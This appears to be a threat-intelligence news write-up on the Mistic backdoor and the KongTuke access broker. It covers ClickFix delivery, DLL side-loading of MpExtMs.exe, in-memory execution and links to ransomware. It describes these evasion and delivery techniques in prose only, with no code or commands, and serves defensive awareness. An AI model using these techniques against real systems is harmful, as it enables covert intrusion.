Mistic Backdoor
A sophisticated backdoor known as Mistic, also tracked as MLTBackdoor, has surfaced in a wave of suspected financially motivated cyberattacks that have been active since April 2026. The malware has been detected in attacks against organizations operating in the insurance, education, information technology, and professional services sectors.
Security researchers have linked the operation to the initial access broker (IAB) KongTuke, also known by several aliases, including 404 TDS, Chaya_002, LandUpdate808, TAG-124, and Woodgnat. During these intrusions, Mistic has been deployed alongside ModeloRAT, a Python-based remote access trojan previously attributed to the same threat actor.
Table of Contents
Designed for Stealth and Long-Term Access
Mistic stands out because of its ability to operate entirely in memory without writing files to disk, significantly reducing the chances of detection. The malware also incorporates a built-in kill switch that allows it to erase itself when necessary. These characteristics suggest that the operators are focused on maintaining persistent and covert access to compromised environments.
To avoid attracting attention, the malware relies on DLL side-loading techniques, abusing Microsoft's legitimate endpoint security utility MpExtMs.exe to blend into normal system activity.
The Evolution of ClickFix Delivery Campaigns
ModeloRAT first gained attention in January 2026 during investigations into a ClickFix campaign variant known as CrashFix. In this operation, KongTuke actors distributed a malicious Google Chrome extension disguised as an ad blocker. The extension intentionally crashed victims' browsers and then deceived them into executing malicious commands under the guise of performing a security scan.
Another ClickFix campaign used a different approach by instructing victims to execute commands that performed a Domain Name System (DNS) lookup. The DNS request was then used to retrieve the next-stage payload, effectively turning DNS into a lightweight staging and signaling mechanism for the attackers.
In June 2026, researchers also highlighted the use of ClickFix as a delivery mechanism for Mistic, attributing the activity to a ransomware-associated threat actor attempting to gain an initial foothold and facilitate lateral movement across networks.
Capabilities That Make Mistic Highly Dangerous
The backdoor offers a broad set of functions commonly associated with advanced remote access malware, including:
Uploading and downloading files, creating folders, and moving, renaming, or deleting files.
Executing malicious code directly in memory, loading Beacon Object Files to extend functionality, modifying command polling intervals, and terminating and deleting itself to eliminate evidence.
Opportunistic Targeting and Ransomware Connections
The campaign appears to follow an opportunistic model rather than focusing on a single industry. Attackers are reportedly compromising a wide range of organizations and then evaluating which victims could provide profitable access opportunities for sale to other cybercriminals.
Researchers have also observed ModeloRAT in attacks that ultimately resulted in the deployment of Qilin ransomware, reinforcing the connection between initial access brokers and ransomware operators.
KongTuke’s Expanding Arsenal of Social Engineering Techniques
KongTuke operates a sophisticated traffic distribution system (TDS) built on compromised WordPress websites. This infrastructure is used to present continuously changing lures that redirect unsuspecting visitors toward malware delivery chains.
More recently, security companies Rapid7 and ReliaQuest reported that the threat actor has shifted tactics by sending Microsoft Teams messages from fraudulent 'IT Support' accounts. These messages initiate an attack chain that culminates in the deployment of ModeloRAT.
A Growing Trend in Custom Malware Development
The sophistication of Mistic and the suspected involvement of Woodgnat in the development of ModeloRAT point to a highly skilled group specializing in stealthy remote access tools. The emergence of Backdoor.Mistic also reflects a broader industry trend in which ransomware operations increasingly rely on custom-built malware, exfiltration utilities, and specialized access tools.
Current evidence suggests that Mistic is likely the product of access brokers collaborating with ransomware affiliates rather than a tool developed directly by a ransomware group itself.
